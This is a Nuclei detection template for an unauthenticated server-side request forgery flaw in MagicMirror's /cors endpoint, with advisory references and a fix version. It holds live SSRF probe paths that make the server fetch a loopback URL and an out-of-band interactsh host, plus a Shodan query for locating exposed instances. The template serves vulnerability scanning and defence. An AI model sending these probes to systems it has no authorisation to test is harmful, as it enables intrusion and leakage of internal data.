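id: CVE-2026-42281

info:
  name: MagicMirror <= 2.35.0 - Server-Side Request Forgery
  author: aleff-github
  severity: critical
  description: |
    An unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (VAR_NAME), enabling exfiltration of server-side secrets.
  impact: |
    A remote unauthenticated attacker can force the MagicMirror server to request localhost, internal network, and cloud metadata endpoints. In affected configurations, the endpoint can return server-side responses to the attacker.
  remediation: |
    Upgrade MagicMirror to version 2.36.0 or later.
  reference:
    - https://github.com/advisories/GHSA-ph6f-2cvq-79hq
    - https://github.com/MagicMirrorOrg/MagicMirror/security/advisories/GHSA-ph6f-2cvq-79hq
    - https://github.com/MagicMirrorOrg/MagicMirror/releases/tag/v2.36.0
    - https://osv.dev/vulnerability/GHSA-ph6f-2cvq-79hq
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
    cvss-score: 9.2
    cve-id: CVE-2026-42281
    epss-score: 0.0326
    epss-percentile: 0.8738
    cwe-id: CWE-918
  metadata:
    # Worst case is three requests: one fingerprint probe in http(1) plus the
    # two paths of http(2). stop-at-first-match can cut that to two, but the
    # bound is the total, so 2 under-counted it.
    max-request: 3
    verified: true
    product: magicmirror
    vendor: magicmirrororg
    shodan-query: 'http.title:"MagicMirror"'
  tags: cve,cve2026,magicmirror,ssrf,unauth,oast,oob

# http(2) only runs when http(1)'s internal matcher fired, so the SSRF probe is
# never sent to hosts that do not look like MagicMirror.
flow: http(1) && http(2)

http:
  # Step 1 - passive fingerprint: fetch the root page, follow up to two
  # redirects, and require "MagicMirror" in the body. The matcher is internal,
  # so it gates the flow without producing a finding by itself.
  - method: GET
    path:
      - "{{BaseURL}}"
    host-redirects: true
    max-redirects: 2
    matchers:
      - type: word
        part: body
        words:
          - "MagicMirror"
        internal: true

  # Step 2 - active SSRF check against the vulnerable /cors endpoint. Both paths
  # make the target server issue an outbound request; this is not a
  # version-banner check. Ordering matters: the loopback probe is tried first
  # and, with stop-at-first-match, the OOB probe is only sent if it fails.
  - method: GET
    path:
      # Loopback probe: ask the server to fetch its own /version endpoint.
      # Assumes the instance listens on 8080 locally - if it is bound to a
      # different port this path misses and the OOB path decides the result.
      - "{{BaseURL}}/cors?url=http://127.0.0.1:8080/version"
      # Out-of-band probe: a DNS lookup of the interactsh host proves the
      # server resolved an attacker-controlled name. Requires OAST connectivity
      # from the target; in egress-filtered networks only the first path can
      # confirm.
      - "{{BaseURL}}/cors?url=http://{{interactsh-url}}/version"
    stop-at-first-match: true
    matchers-condition: or
    matchers:
      # Positive only for 0.x, 1.x and 2.0 - 2.35.x; 2.36.0 (the fix) and later
      # fall outside the alternation. The body must be the bare version string
      # proxied back through /cors, which is what the loopback path returns.
      - type: dsl
        name: version
        dsl:
          - regex('^(?:[01]\.[0-9]+\.[0-9]+|2\.(?:[0-9]|[12][0-9]|3[0-5])\.[0-9]+)\s*$', body)
          - status_code == 200
        condition: and

      # The original listed the DSL expressions directly under "name: dns"
      # without the "dsl:" key, which is not valid YAML for this matcher;
      # restored here. A 200 is still required so an error page that happens to
      # coincide with an unrelated DNS hit does not count.
      - type: dsl
        name: dns
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - status_code == 200
        condition: and

# Template signature over the original body. Any edit to the lines above
# (including this reformatting) invalidates it; re-sign before distribution.
# digest: 490a0046304402200b12223794abf1a390d6f52c424d887002d5a8003c0bd33a3a45dcffb22778e502203060ddb15d24a7a2e5f1ba7f25e7714b0ed01615252ac4aa7783d479cc9a74ee:922c64590222798bb761d5b6d8e72950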